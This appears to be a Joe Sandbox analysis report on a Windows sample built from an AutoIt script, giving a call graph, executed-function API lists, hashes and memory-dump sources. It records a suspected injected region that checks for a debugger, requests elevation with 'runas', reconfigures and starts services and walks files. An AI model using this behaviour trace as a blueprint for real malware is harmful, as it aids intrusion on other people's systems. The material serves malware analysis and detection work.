422d40 __cinit 67 API calls 111270->111271 111271->111269 111273 407667 59 API calls 111272->111273 111274 4049b8 GetVersionExW 111273->111274 111275 407bcc 59 API calls 111274->111275 111276 4049fb 111275->111276 111277 407d2c 59 API calls 111276->111277 111286 404a28 111276->111286 111278 404a1c 111277->111278 111279 407726 59 API calls 111278->111279 111279->111286 111280 404a93 GetCurrentProcess IsWow64Process 111281 404aac 111280->111281 111283 404ac2 111281->111283 111284 404b2b GetSystemInfo 111281->111284 111282 43d864 111296 404b37 111283->111296 111285 404af8 111284->111285 111285->111264 111286->111280 111286->111282 111289 404ad4 111292 404b37 2 API calls 111289->111292 111290 404b1f GetSystemInfo 111291 404ae9 111290->111291 111291->111285 111294 404aef FreeLibrary 111291->111294 111293 404adc GetNativeSystemInfo 111292->111293 111293->111291 111294->111285 111297 404ad0 111296->111297 111298 404b40 LoadLibraryA 111296->111298 111297->111289 111297->111290 111298->111297 111299 404b51 GetProcAddress 111298->111299 111299->111297 111300 401078 111305 40708b 111300->111305 111302 40108c 111303 422d40 __cinit 67 API calls 111302->111303 111304 401096 111303->111304 111306 40709b __ftell_nolock 111305->111306 111307 407667 59 API calls 111306->111307 111308 407151 111307->111308 111309 404706 61 API calls 111308->111309 111310 40715a 111309->111310 111336 42050b 111310->111336 111313 407cab 59 API calls 111314 407173 111313->111314 111315 403f74 59 API calls 111314->111315 111316 407182 111315->111316 111317 407667 59 API calls 111316->111317 111318 40718b 111317->111318 111319 407d8c 59 API calls 111318->111319 111320 407194 RegOpenKeyExW 111319->111320 111321 43e8b1 RegQueryValueExW 111320->111321 111325 4071b6 Mailbox 111320->111325 111322 43e943 RegCloseKey 111321->111322 111323 43e8ce 111321->111323 111322->111325 111335 43e955 _wcscat Mailbox __NMSG_WRITE 111322->111335 111324 420db6 Mailbox 59 API calls 111323->111324 111326 43e8e7 111324->111326 111325->111302 111327 40522e 59 API calls 111326->111327 111328 43e8f2 RegQueryValueExW 111327->111328 111329 43e90f 111328->111329 111332 43e929 111328->111332 111331 407bcc 59 API calls 111329->111331 111330 4079f2 59 API calls 111330->111335 111331->111332 111332->111322 111333 407de1 59 API calls 111333->111335 111334 403f74 59 API calls 111334->111335 111335->111325 111335->111330 111335->111333 111335->111334 111337 431940 __ftell_nolock 111336->111337 111338 420518 GetFullPathNameW 111337->111338 111339 42053a 111338->111339 111340 407bcc 59 API calls 111339->111340 111341 407165 111340->111341 111341->111313 111342 2f1520c 111345 2f3cbd0 111342->111345 111344 2f15211 111354 2f3be50 _wcslen 111345->111354 111346 2f3c168 111384 2f3a905 LocalFree 111346->111384 111348 2f15d20 2 API calls 111348->111354 111349 2f3c78e CloseServiceHandle 111349->111354 111350 2f3bffd StrStrIW 111350->111354 111351 2f3bfe9 111351->111344 111352 2f3c706 StrStrIW 111352->111354 111353 2f3c72b StrStrIW 111353->111354 111354->111344 111354->111345 111354->111346 111354->111348 111354->111349 111354->111350 111354->111351 111354->111352 111354->111353 111356 2f3bf68 StrStrIW 111354->111356 111358 2f3c0fd CloseServiceHandle 111354->111358 111359 2f3c399 StrStrIW 111354->111359 111360 2f3c7e4 StartServiceW 111354->111360 111363 2f3bf7e 111354->111363 111364 2f3c65a ChangeServiceConfigW 111354->111364 111365 2f1ce90 111354->111365 111383 2f3a350 CloseServiceHandle 111354->111383 111356->111354 111358->111354 111359->111354 111361 2f3c3a9 111359->111361 111360->111354 111361->111344 111362 2f3c36b OpenServiceW 111362->111354 111363->111360 111363->111362 111364->111351 111364->111354 111374 2f1cc9b _wcslen 111365->111374 111366 2f1d5c5 CreateFileW 111366->111374 111367 2f1d729 GetFileSizeEx 111369 2f1d8a1 CloseHandle 111367->111369 111367->111374 111368 2f1d426 111368->111369 111370 2f1d42a CloseHandle 111368->111370 111369->111374 111370->111374 111371 2f1cd5c lstrcmpiW 111371->111374 111373 2f15d20 VirtualAlloc VirtualFree 111373->111374 111374->111354 111374->111365 111374->111366 111374->111367 111374->111368 111374->111369 111374->111370 111374->111371 111374->111373 111375 2f1cca0 lstrcmpiW 111374->111375 111377 2f1d049 SetFilePointerEx 111374->111377 111378 2f1d378 CloseHandle 111374->111378 111379 2f1cfbb GetFileTime 111374->111379 111380 2f1cc92 111374->111380 111382 2f1d903 111374->111382 111385 2f18937 VirtualAlloc VirtualFree 111374->111385 111386 2f18470 VirtualAlloc VirtualFree 111374->111386 111375->111374 111377->111374 111378->111374 111379->111374 111380->111354 111381 2f4fdfc 40 API calls 111381->111382 111382->111380 111382->111381 111383->111354 111384->111351 111385->111374 111387 43fdfc 111390 40ab30 Mailbox _memmove 111387->111390 111389 45617e Mailbox 59 API calls 111412 40a057 111389->111412 111392 40b525 111390->111392 111411 407de1 59 API calls 111390->111411 111390->111412 111416 409f37 Mailbox 111390->111416 111417 47bc6b 331 API calls 111390->111417 111420 40b2b6 111390->111420 111422 409ea0 331 API calls 111390->111422 111423 44086a 111390->111423 111425 440878 111390->111425 111427 44085c 111390->111427 111428 40b21c 111390->111428 111430 420db6 59 API calls Mailbox 111390->111430 111433 456e8f 59 API calls 111390->111433 111438 47445a 331 API calls 111390->111438 111439 48241e 111390->111439 111452 47df23 111390->111452 111455 47df37 111390->111455 111458 482141 111390->111458 111496 47c2e0 111390->111496 111528 467956 111390->111528 111534 45617e 111390->111534 111539 409c90 59 API calls Mailbox 111390->111539 111543 47c193 85 API calls 2 library calls 111390->111543 111545 469e4a 89 API calls 4 library calls 111392->111545 111395 4409e5 111550 469e4a 89 API calls 4 library calls 111395->111550 111396 440055 111544 469e4a 89 API calls 4 library calls 111396->111544 111399 420db6 59 API calls Mailbox 111399->111416 111401 40b475 111404 408047 59 API calls 111401->111404 111402 440064 111404->111412 111406 407667 59 API calls 111406->111416 111408 408047 59 API calls 111408->111416 111409 40b47a 111409->111395 111409->111396 111410 456e8f 59 API calls 111410->111416 111411->111390 111413 4409d6 111549 469e4a 89 API calls 4 library calls 111413->111549 111415 422d40 67 API calls __cinit 111415->111416 111416->111396 111416->111399 111416->111401 111416->111406 111416->111408 111416->111409 111416->111410 111416->111412 111416->111413 111416->111415 111418 40a55a 111416->111418 111537 40c8c0 331 API calls 2 library calls 111416->111537 111538 40b900 60 API calls Mailbox 111416->111538 111417->111390 111548 469e4a 89 API calls 4 library calls 111418->111548 111542 40f6a3 331 API calls 111420->111542 111422->111390 111546 409c90 59 API calls Mailbox 111423->111546 111547 469e4a 89 API calls 4 library calls 111425->111547 111427->111389 111427->111412 111540 409d3c 60 API calls Mailbox 111428->111540 111430->111390 111431 40b22d 111541 409d3c 60 API calls Mailbox 111431->111541 111433->111390 111438->111390 111440 409837 84 API calls 111439->111440 111441 482436 111440->111441 111442 407667 59 API calls 111441->111442 111443 482444 111442->111443 111444 409b3c 59 API calls 111443->111444 111447 48244f 111444->111447 111445 482479 111551 409a3c 59 API calls Mailbox 111445->111551 111447->111445 111449 409837 84 API calls 111447->111449 111448 482485 Mailbox 111448->111390 111450 48246a 111449->111450 111451 40784b 59 API calls 111450->111451 111451->111445 111552 47cadd 111452->111552 111454 47df33 111454->111390 111456 47cadd 130 API calls 111455->111456 111457 47df47 111456->111457 111457->111390 111459 407667 59 API calls 111458->111459 111460 482158 111459->111460 111461 409837 84 API calls 111460->111461 111462 482167 111461->111462 111463 407a16 59 API calls 111462->111463 111464 48217a 111463->111464 111465 409837 84 API calls 111464->111465 111466 482187 111465->111466 111467 4821a1 111466->111467 111468 482215 111466->111468 111469 409b3c 59 API calls 111467->111469 111470 409837 84 API calls 111468->111470 111471 4821a6 111469->111471 111472 48221a 111470->111472 111473 482204 111471->111473 111476 4821bd 111471->111476 111474 482228 111472->111474 111475 482246 111472->111475 111661 409a98 59 API calls Mailbox 111473->111661 111662 409a98 59 API calls Mailbox 111474->111662 111478 48225b 111475->111478 111482 409b3c 59 API calls 111475->111482 111481 40784b 59 API calls 111476->111481 111483 482270 111478->111483 111484 409b3c 59 API calls 111478->111484 111480 482211 Mailbox 111480->111390 111486 4821ca 111481->111486 111482->111478 111485 407f77 59 API calls 111483->111485 111484->111483 111487 48228a 111485->111487 111488 407b2e 59 API calls 111486->111488 111642 45f401 111487->111642 111490 4821d8 111488->111490 111491 40784b 59 API calls 111490->111491 111493 4821f1 111491->111493 111492 4821ff 111663 409a3c 59 API calls Mailbox 111492->111663 111494 407b2e 59 API calls 111493->111494 111494->111492 111497 407667 59 API calls 111496->111497 111498 47c2f4 111497->111498 111499 407667 59 API calls 111498->111499 111500 47c2fc 111499->111500 111501 407667 59 API calls 111500->111501 111502 47c304 111501->111502 111503 409837 84 API calls 111502->111503 111527 47c312 111503->111527 111504 407bcc 59 API calls 111504->111527 111505 407924 59 API calls 111505->111527 111506 47c4fb 111507 47c528 Mailbox 111506->111507 111666 409a3c 59 API calls Mailbox 111506->111666 111507->111390 111508 47c4e2 111512 407cab 59 API calls 111508->111512 111510 47c4fd 111513 407cab 59 API calls 111510->111513 111511 408047 59 API calls 111511->111527 111514 47c4ef 111512->111514 111515 47c50c 111513->111515 111517 407b2e 59 API calls 111514->111517 111518 407b2e 59 API calls 111515->111518 111516 407e4f 59 API calls 111520 47c3a9 CharUpperBuffW 111516->111520 111517->111506 111518->111506 111519 407e4f 59 API calls 111521 47c469 CharUpperBuffW 111519->111521 111664 40843a 68 API calls 111520->111664 111665 40c5a7 69 API calls 2 library calls 111521->111665 111524 407cab 59 API calls 111524->111527 111525 409837 84 API calls 111525->111527 111526 407b2e 59 API calls 111526->111527 111527->111504 111527->111505 111527->111506 111527->111507 111527->111508 111527->111510 111527->111511 111527->111516 111527->111519 111527->111524 111527->111525 111527->111526 111529 467962 111528->111529 111530 420db6 Mailbox 59 API calls 111529->111530 111531 467970 111530->111531 111532 46797e 111531->111532 111533 407667 59 API calls 111531->111533 111532->111390 111533->111532 111667 4560c0 111534->111667 111536 45618c 111536->111390 111537->111416 111538->111416 111539->111390 111540->111431 111541->111420 111542->111392 111543->111390 111544->111402 111545->111427 111546->111427 111547->111427 111548->111412 111549->111395 111550->111412 111551->111448 111553 409837 84 API calls 111552->111553 111554 47cb1a 111553->111554 111578 47cb61 Mailbox 111554->111578 111590 47d7a5 111554->111590 111556 47cdb9 111557 47cf2e 111556->111557 111561 47cdc7 111556->111561 111629 47d8c8 92 API calls Mailbox 111557->111629 111560 47cf3d 111560->111561 111562 47cf49 111560->111562 111603 47c96e 111561->111603 111562->111578 111563 409837 84 API calls 111581 47cbb2 Mailbox 111563->111581 111568 47ce00 111618 420c08 111568->111618 111571 47ce33 111574 4092ce 59 API calls 111571->111574 111572 47ce1a 111624 469e4a 89 API calls 4 library calls 111572->111624 111576 47ce3f 111574->111576 111575 47ce25 GetCurrentProcess TerminateProcess 111575->111571 111577 409050 59 API calls 111576->111577 111579 47ce55 111577->111579 111578->111454 111589 47ce7c 111579->111589 111625 408d40 59 API calls Mailbox 111579->111625 111581->111556 111581->111563 111581->111578 111622 47fbce 59 API calls 2 library calls 111581->111622 111623 47cfdf 61 API calls 2 library calls 111581->111623 111582 47cfa4 111582->111578 111584 47cfb8 FreeLibrary 111582->111584 111583 47ce6b 111626 47d649 107 API calls _free 111583->111626 111584->111578 111589->111582 111627 408d40 59 API calls Mailbox 111589->111627 111628 409d3c 60 API calls Mailbox 111589->111628 111630 47d649 107 API calls _free 111589->111630 111591 407e4f 59 API calls 111590->111591 111592 47d7c0 CharLowerBuffW 111591->111592 111631 45f167 111592->111631 111596 407667 59 API calls 111597 47d7f9 111596->111597 111598 40784b 59 API calls 111597->111598 111599 47d810 111598->111599 111600 407d2c 59 API calls 111599->111600 111601 47d81c Mailbox 111600->111601 111602 47d858 Mailbox 111601->111602 111638 47cfdf 61 API calls 2 library calls 111601->111638 111602->111581 111604 47c989 111603->111604 111608 47c9de 111603->111608 111605 420db6 Mailbox 59 API calls 111604->111605 111606 47c9ab 111605->111606 111607 420db6 Mailbox 59 API calls 111606->111607 111606->111608 111607->111606 111609 47da50 111608->111609 111610 47dc79 Mailbox 111609->111610 111614 47da73 _strcat _wcscpy __NMSG_WRITE 111609->111614 111610->111568 111611 409be6 59 API calls 111611->111614 111612 409b3c 59 API calls 111612->111614 111613 409b98 59 API calls 111613->111614 111614->111610 111614->111611 111614->111612 111614->111613 111615 409837 84 API calls 111614->111615 111616 42571c 58 API calls std::exception::_Copy_str 111614->111616 111641 465887 61 API calls 2 library calls 111614->111641 111615->111614 111616->111614 111620 420c1d 111618->111620 111619 420cb5 VirtualProtect 111621 420c83 111619->111621 111620->111619 111620->111621 111621->111571 111621->111572 111622->111581 111623->111581 111624->111575 111625->111583 111626->111589 111627->111589 111628->111589 111629->111560 111630->111589 111632 45f192 __NMSG_WRITE 111631->111632 111633 45f1d1 111632->111633 111636 45f1c7 111632->111636 111637 45f278 111632->111637 111633->111596 111633->111601 111636->111633 111639 4078c4 61 API calls 111636->111639 111637->111633 111640 4078c4 61 API calls 111637->111640 111638->111602 111639->111636 111640->111637 111641->111614 111643 407667 59 API calls 111642->111643 111644 45f414 111643->111644 111645 407a16 59 API calls 111644->111645 111646 45f428 111645->111646 111647 45f167 61 API calls 111646->111647 111650 45f44a 111646->111650 111649 45f444 111647->111649 111648 45f167 61 API calls 111648->111650 111649->111650 111651 40784b 59 API calls 111649->111651 111650->111648 111652 40784b 59 API calls 111650->111652 111653 45f4c4 111650->111653 111655 407b2e 59 API calls 111650->111655 111651->111650 111652->111650 111654 40784b 59 API calls 111653->111654 111656 45f4dd 111654->111656 111655->111650 111657 407b2e 59 API calls 111656->111657 111658 45f4e9 111657->111658 111659 407f77 59 API calls 111658->111659 111660 45f4f8 Mailbox 111658->111660 111659->111660 111660->111492 111661->111480 111662->111480 111663->111480 111664->111527 111665->111527 111666->111507 111668 4560e8 111667->111668 111669 4560cb 111667->111669 111668->111536 111669->111668 111671 4560ab 59 API calls Mailbox 111669->111671 111671->111669

                                                                              Executed Functions

                                                                              Function 02F3CBD0 Relevance: 23.2, APIs: 11, Strings: 2, Instructions: 418COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1454997766.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2f10000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: d$w
                                                                              • API String ID: 0-2400632791
                                                                              • Opcode ID: 80621b43b41d545b75f308f1e74ad361fd00b392462f1c240ee658746d899b4b
                                                                              • Instruction ID: 2193cbdb64778443b2a9948bfca38cf51f3f8f25781921162b3e55f57100c88d
                                                                              • Opcode Fuzzy Hash: 80621b43b41d545b75f308f1e74ad361fd00b392462f1c240ee658746d899b4b
                                                                              • Instruction Fuzzy Hash: 83C15A32E0C380AEEA336628CC29B397B646B51BECF4C0147EB56F61F2D7658444D622
                                                                              Function 00403B3A Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 153windowCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00403B68
                                                                              • IsDebuggerPresent.KERNEL32 ref: 00403B7A
                                                                              • GetFullPathNameW.KERNEL32(00007FFF,?,?,004C52F8,004C52E0,?,?), ref: 00403BEB
                                                                                • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                                • Part of subcall function 0041092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00403C14,004C52F8,?,?,?), ref: 0041096E
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00403C6F
                                                                              • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,004B7770,00000010), ref: 0043D281
                                                                              • SetCurrentDirectoryW.KERNEL32(?,004C52F8,?,?,?), ref: 0043D2B9
                                                                              • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,004B4260,004C52F8,?,?,?), ref: 0043D33F
                                                                              • ShellExecuteW.SHELL32(00000000,?,?), ref: 0043D346
                                                                                • Part of subcall function 00403A46: GetSysColorBrush.USER32(0000000F), ref: 00403A50
                                                                                • Part of subcall function 00403A46: LoadCursorW.USER32(00000000,00007F00), ref: 00403A5F
                                                                                • Part of subcall function 00403A46: LoadIconW.USER32(00000063), ref: 00403A76
                                                                                • Part of subcall function 00403A46: LoadIconW.USER32(000000A4), ref: 00403A88
                                                                                • Part of subcall function 00403A46: LoadIconW.USER32(000000A2), ref: 00403A9A
                                                                                • Part of subcall function 00403A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00403AC0
                                                                                • Part of subcall function 00403A46: RegisterClassExW.USER32(?), ref: 00403B16
                                                                                • Part of subcall function 004039D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00403A03
                                                                                • Part of subcall function 004039D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00403A24
                                                                                • Part of subcall function 004039D5: ShowWindow.USER32(00000000,?,?), ref: 00403A38
                                                                                • Part of subcall function 004039D5: ShowWindow.USER32(00000000,?,?), ref: 00403A41
                                                                                • Part of subcall function 0040434A: _memset.LIBCMT ref: 00404370
                                                                                • Part of subcall function 0040434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00404415
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                                              • String ID: This is a third-party compiled AutoIt script.$runas$%I
                                                                              • API String ID: 529118366-2806069697
                                                                              • Opcode ID: 8a354285df3667772635141aacac326053c8f0667906653ecfa92a4f7edcf7fd
                                                                              • Instruction ID: 3b6422646bc5bb7d448bfeb78fc2b200dbb07c6b17ab8a28721e135d33d4e7f3
                                                                              • Opcode Fuzzy Hash: 8a354285df3667772635141aacac326053c8f0667906653ecfa92a4f7edcf7fd
                                                                              • Instruction Fuzzy Hash: 8D519275D08108AADB01AFB5EC05EEE7BB8AB45745B1040BFF811B21E1DA786685CB2D
                                                                              Function 004049A0 Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 2065 4049a0-404a00 call 407667 GetVersionExW call 407bcc 2070 404a06 2065->2070 2071 404b0b-404b0d 2065->2071 2072 404a09-404a0e 2070->2072 2073 43d767-43d773 2071->2073 2075 404b12-404b13 2072->2075 2076 404a14 2072->2076 2074 43d774-43d778 2073->2074 2077 43d77b-43d787 2074->2077 2078 43d77a 2074->2078 2079 404a15-404a4c call 407d2c call 407726 2075->2079 2076->2079 2077->2074 2080 43d789-43d78e 2077->2080 2078->2077 2088 404a52-404a53 2079->2088 2089 43d864-43d867 2079->2089 2080->2072 2082 43d794-43d79b 2080->2082 2082->2073 2084 43d79d 2082->2084 2087 43d7a2-43d7a5 2084->2087 2090 404a93-404aaa GetCurrentProcess IsWow64Process 2087->2090 2091 43d7ab-43d7c9 2087->2091 2088->2087 2092 404a59-404a64 2088->2092 2093 43d880-43d884 2089->2093 2094 43d869 2089->2094 2095 404aac 2090->2095 2096 404aaf-404ac0 2090->2096 2091->2090 2097 43d7cf-43d7d5 2091->2097 2098 43d7ea-43d7f0 2092->2098 2099 404a6a-404a6c 2092->2099 2101 43d886-43d88f 2093->2101 2102 43d86f-43d878 2093->2102 2100 43d86c 2094->2100 2095->2096 2104 404ac2-404ad2 call 404b37 2096->2104 2105 404b2b-404b35 GetSystemInfo 2096->2105 2106 43d7d7-43d7da 2097->2106 2107 43d7df-43d7e5 2097->2107 2110 43d7f2-43d7f5 2098->2110 2111 43d7fa-43d800 2098->2111 2108 404a72-404a75 2099->2108 2109 43d805-43d811 2099->2109 2100->2102 2101->2100 2103 43d891-43d894 2101->2103 2102->2093 2103->2102 2122 404ad4-404ae1 call 404b37 2104->2122 2123 404b1f-404b29 GetSystemInfo 2104->2123 2112 404af8-404b08 2105->2112 2106->2090 2107->2090 2116 43d831-43d834 2108->2116 2117 404a7b-404a8a 2108->2117 2113 43d813-43d816 2109->2113 2114 43d81b-43d821 2109->2114 2110->2090 2111->2090 2113->2090 2114->2090 2116->2090 2119 43d83a-43d84f 2116->2119 2120 404a90 2117->2120 2121 43d826-43d82c 2117->2121 2124 43d851-43d854 2119->2124 2125 43d859-43d85f 2119->2125 2120->2090 2121->2090 2130 404ae3-404ae7 GetNativeSystemInfo 2122->2130 2131 404b18-404b1d 2122->2131 2126 404ae9-404aed 2123->2126 2124->2090 2125->2090 2126->2112 2129 404aef-404af2 FreeLibrary 2126->2129 2129->2112 2130->2126 2131->2130
                                                                              APIs
                                                                              • GetVersionExW.KERNEL32(?), ref: 004049CD
                                                                                • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                              • GetCurrentProcess.KERNEL32(?,0048FAEC,00000000,00000000,?), ref: 00404A9A
                                                                              • IsWow64Process.KERNEL32(00000000), ref: 00404AA1
                                                                              • GetNativeSystemInfo.KERNEL32(00000000), ref: 00404AE7
                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00404AF2
                                                                              • GetSystemInfo.KERNEL32(00000000), ref: 00404B23
                                                                              • GetSystemInfo.KERNEL32(00000000), ref: 00404B2F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                                              • String ID:
                                                                              • API String ID: 1986165174-0
                                                                              • Opcode ID: b374ae1e67c8a6c2b1dbeda5d6e5ff35506d62aec5490ffb1568074e7c13b988
                                                                              • Instruction ID: 9368d54b81b13d28e750e9b7a77ce7499fab44d9898740901c219fded0589530
                                                                              • Opcode Fuzzy Hash: b374ae1e67c8a6c2b1dbeda5d6e5ff35506d62aec5490ffb1568074e7c13b988
                                                                              • Instruction Fuzzy Hash: 7A91A4719897C0DACB21DBA894501ABBFF5AF69300F444D6FD1C6A3B41D238B908C76E
                                                                              Function 00404E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 2132 404e89-404ea1 CreateStreamOnHGlobal 2133 404ec1-404ec6 2132->2133 2134 404ea3-404eba FindResourceExW 2132->2134 2135 43d933-43d942 LoadResource 2134->2135 2136 404ec0 2134->2136 2135->2136 2137 43d948-43d956 SizeofResource 2135->2137 2136->2133 2137->2136 2138 43d95c-43d967 LockResource 2137->2138 2138->2136 2139 43d96d-43d98b 2138->2139 2139->2136
                                                                              APIs
                                                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00404D8E,?,?,00000000,00000000), ref: 00404E99
                                                                              • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00404D8E,?,?,00000000,00000000), ref: 00404EB0
                                                                              • LoadResource.KERNEL32(?,00000000,?,?,00404D8E,?,?,00000000,00000000,?,?,?,?,?,?,00404E2F), ref: 0043D937
                                                                              • SizeofResource.KERNEL32(?,00000000,?,?,00404D8E,?,?,00000000,00000000,?,?,?,?,?,?,00404E2F), ref: 0043D94C
                                                                              • LockResource.KERNEL32(00404D8E,?,?,00404D8E,?,?,00000000,00000000,?,?,?,?,?,?,00404E2F,00000000), ref: 0043D95F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                              • String ID: SCRIPT
                                                                              • API String ID: 3051347437-3967369404
                                                                              • Opcode ID: 41d1929798edb895ac9d7ecac736fa75257a1a0119b35b9f9055d793dd554d7f
                                                                              • Instruction ID: 68981a4d98a1b9f26aaf18e99fd77eadcf83d6f3c297b7fdd3b7e429ee84fbe5
                                                                              • Opcode Fuzzy Hash: 41d1929798edb895ac9d7ecac736fa75257a1a0119b35b9f9055d793dd554d7f
                                                                              • Instruction Fuzzy Hash: 59119EB0200300BFD7208B65EC48F2B7BBAFBC9B11F20467DF505D62A0DB71E8058665
                                                                              Function 0040FCE0 Relevance: 9.8, APIs: 3, Strings: 2, Instructions: 1040COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: BuffCharUpper
                                                                              • String ID: pbL$%I
                                                                              • API String ID: 3964851224-1578263234
                                                                              • Opcode ID: dfbcc37cd1eaecf0c5fa999f792a3d1c1c10435ba2f132f832dcd1883ffe7f21
                                                                              • Instruction ID: 7d186bf48a599790b4ae94b3728c2257f551fe3f353e5d611b392294ecc69107
                                                                              • Opcode Fuzzy Hash: dfbcc37cd1eaecf0c5fa999f792a3d1c1c10435ba2f132f832dcd1883ffe7f21
                                                                              • Instruction Fuzzy Hash: C8927D706043419FD720DF15C480B6BB7E1BF89304F14896EE8999B392D779EC85CB9A
                                                                              Function 0040E6A0 Relevance: 7.4, Strings: 5, Instructions: 1102COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
